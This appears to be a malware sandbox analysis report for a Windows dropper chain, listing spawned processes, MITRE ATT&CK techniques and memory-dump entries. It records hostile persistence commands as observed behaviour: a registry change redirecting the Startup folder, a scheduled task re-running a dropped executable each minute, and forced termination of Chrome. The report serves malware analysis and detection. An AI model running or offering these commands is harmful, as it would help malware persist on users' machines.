        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        8⤵
        Executes dropped EXE
        
        PID:856
        
        C:\Users\Admin\AppData\Local\Temp\is-DE4EJ.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DE4EJ.tmp\setup_2.tmp" /SL5="$101AE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\is-DLEMU.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-DLEMU.tmp\postback.exe" ss1
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2664
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        11⤵
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\CvC5k3Ixa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CvC5k3Ixa.exe"
        12⤵
        Executes dropped EXE
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"
        13⤵
        Executes dropped EXE
        
        PID:1168
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        14⤵
        
        PID:2924
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        15⤵
        
        PID:2620
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F
        14⤵
        Creates scheduled task(s)
        
        PID:2640
      - C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        7⤵
        Executes dropped EXE
        
        PID:3032
      - C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        6⤵
        Executes dropped EXE
        
        PID:2968
      - C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon1590e659d520c442.exe
    3⤵
    - Loads dropped DLL
    PID:1384
  - - C:\Users\Admin\AppData\Local\Temp\7zS08619B14\Mon1590e659d520c442.exe
      Mon1590e659d520c442.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      PID:1836
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:2372
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2432

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2216
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:2232

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2412
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:2888

C:\Windows\system32\taskeng.exe
taskeng.exe {7CC928ED-B829-42EC-B788-22621DA4E745} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]
1⤵
PID:2784
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:2796

C:\Users\Admin\AppData\Local\Temp\F67F.exe
C:\Users\Admin\AppData\Local\Temp\F67F.exe
1⤵
- Executes dropped EXE
PID:1240

C:\Users\Admin\AppData\Local\Temp\1E3B.exe
C:\Users\Admin\AppData\Local\Temp\1E3B.exe
1⤵
PID:2080

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/328-278-0x000000001A750000-0x000000001A752000-memory.dmp

Filesize
8KB

Download
memory/340-155-0x0000000000400000-0x000000000214F000-memory.dmp

Filesize
29.3MB

Download
memory/340-148-0x0000000000240000-0x0000000000249000-memory.dmp

Filesize
36KB

Download
memory/536-156-0x00000000011E0000-0x00000000011E1000-memory.dmp

Filesize
4KB

Download
memory/536-304-0x0000000000D90000-0x0000000000DD3000-memory.dmp

Filesize
268KB

Download
memory/536-162-0x000000001B280000-0x000000001B282000-memory.dmp

Filesize
8KB

Download
memory/856-237-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/920-164-0x000000001B0A0000-0x000000001B0A2000-memory.dmp

Filesize
8KB

Download
memory/920-161-0x00000000003C0000-0x00000000003D8000-memory.dmp

Filesize
96KB

Download
memory/920-158-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

Filesize
4KB

Download
memory/1072-173-0x0000000001E90000-0x0000000002ADA000-memory.dmp

Filesize
12.3MB

Download
memory/1072-165-0x0000000001E90000-0x0000000002ADA000-memory.dmp

Filesize
12.3MB

Download
memory/1072-163-0x0000000001E90000-0x0000000002ADA000-memory.dmp

Filesize
12.3MB

Download
memory/1168-350-0x0000000000400000-0x00000000005C0000-memory.dmp

Filesize
1.8MB

Download
memory/1200-160-0x0000000003BC0000-0x0000000003BD5000-memory.dmp

Filesize
84KB

Download
memory/1240-376-0x0000000000230000-0x0000000000260000-memory.dmp

Filesize
192KB

Download
memory/1240-379-0x0000000000400000-0x0000000002B61000-memory.dmp

Filesize
39.4MB

Download
memory/1404-154-0x0000000000400000-0x00000000021C1000-memory.dmp

Filesize
29.8MB

Download
memory/1404-153-0x0000000002860000-0x0000000004621000-memory.dmp

Filesize
29.8MB

Download
memory/1420-283-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

Filesize
4KB

Download
memory/1500-363-0x0000000004D20000-0x000000000563E000-memory.dmp

Filesize
9.1MB

Download
memory/1500-364-0x0000000000400000-0x0000000002F79000-memory.dmp

Filesize
43.5MB

Download
memory/1616-362-0x0000000000200000-0x0000000000280000-memory.dmp

Filesize
512KB

Download
memory/1664-52-0x0000000075231000-0x0000000075233000-memory.dmp

Filesize
8KB

Download
memory/1748-143-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1748-137-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1748-75-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1748-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1748-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1748-118-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1748-128-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1748-106-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1748-144-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1748-147-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1820-310-0x0000000000D10000-0x0000000000D11000-memory.dmp

Filesize
4KB

Download
memory/1820-149-0x0000000000290000-0x00000000002D8000-memory.dmp

Filesize
288KB

Download
memory/1820-152-0x0000000000400000-0x000000000216F000-memory.dmp

Filesize
29.4MB

Download
memory/2028-361-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2064-357-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/2076-372-0x0000000140000000-0x0000000140763000-memory.dmp

Filesize
7.4MB

Download
memory/2076-373-0x0000000000140000-0x0000000000160000-memory.dmp

Filesize
128KB

Download
memory/2092-366-0x000000001CA90000-0x000000001CA92000-memory.dmp

Filesize
8KB

Download
memory/2204-358-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/2328-252-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/2348-369-0x000000001BE00000-0x000000001BE02000-memory.dmp

Filesize
8KB

Download
memory/2348-275-0x0000000003590000-0x0000000006109000-memory.dmp

Filesize
43.5MB

Download
memory/2348-277-0x0000000000400000-0x0000000002F79000-memory.dmp

Filesize
43.5MB

Download
memory/2368-247-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/2384-190-0x0000000000960000-0x00000000009E0000-memory.dmp

Filesize
512KB

Download
memory/2492-188-0x00000000012E0000-0x00000000012E1000-memory.dmp

Filesize
4KB

Download
memory/2608-326-0x000000001B810000-0x000000001B812000-memory.dmp

Filesize
8KB

Download
memory/2608-196-0x000000013F9D0000-0x000000013F9D1000-memory.dmp

Filesize
4KB

Download
memory/2648-216-0x000000001B1C0000-0x000000001B1C2000-memory.dmp

Filesize
8KB

Download
memory/2648-207-0x00000000001C0000-0x00000000001D8000-memory.dmp

Filesize
96KB

Download
memory/2648-203-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/2672-200-0x0000000000EC0000-0x0000000000EC1000-memory.dmp

Filesize
4KB

Download
memory/2672-202-0x000000001AC80000-0x000000001AC82000-memory.dmp

Filesize
8KB

Download
memory/2720-234-0x0000000000400000-0x0000000002167000-memory.dmp

Filesize
29.4MB

Download
memory/2720-227-0x0000000000240000-0x000000000026F000-memory.dmp

Filesize
188KB

Download
memory/2756-336-0x0000000004B30000-0x0000000004B31000-memory.dmp

Filesize
4KB

Download
memory/2792-251-0x0000000006581000-0x0000000006582000-memory.dmp

Filesize
4KB

Download
memory/2792-274-0x0000000006584000-0x0000000006586000-memory.dmp

Filesize
8KB

Download
memory/2792-246-0x0000000000330000-0x000000000034F000-memory.dmp

Filesize
124KB

Download
memory/2792-257-0x0000000006582000-0x0000000006583000-memory.dmp

Filesize
4KB

Download
memory/2792-236-0x0000000000270000-0x00000000002A0000-memory.dmp

Filesize
192KB

Download
memory/2792-249-0x0000000000400000-0x000000000216F000-memory.dmp

Filesize
29.4MB

Download
memory/2792-260-0x0000000006583000-0x0000000006584000-memory.dmp

Filesize
4KB

Download
memory/2796-375-0x0000000000400000-0x00000000005C0000-memory.dmp

Filesize
1.8MB

Download
memory/2828-217-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2848-348-0x0000000000A10000-0x0000000000A43000-memory.dmp

Filesize
204KB

Download
memory/2848-349-0x0000000000400000-0x00000000005C0000-memory.dmp

Filesize
1.8MB

Download
memory/2864-298-0x00000000008C0000-0x00000000008C1000-memory.dmp

Filesize
4KB

Download
memory/2892-228-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/2892-259-0x0000000000820000-0x0000000000822000-memory.dmp

Filesize
8KB

Download
memory/2892-245-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/2892-241-0x00000000007D0000-0x000000000081B000-memory.dmp

Filesize
300KB

Download
memory/2892-218-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/2916-230-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2960-301-0x00000000056B0000-0x00000000056B1000-memory.dmp

Filesize
4KB

Download
memory/2988-324-0x0000000002BF0000-0x0000000002BF1000-memory.dmp

Filesize
4KB

Download
memory/3000-323-0x0000000004C30000-0x0000000004C31000-memory.dmp

Filesize
4KB

Download
memory/3012-226-0x0000000001020000-0x0000000001021000-memory.dmp

Filesize
4KB

Download
memory/3012-258-0x00000000007C0000-0x00000000007C1000-memory.dmp

Filesize
4KB

Download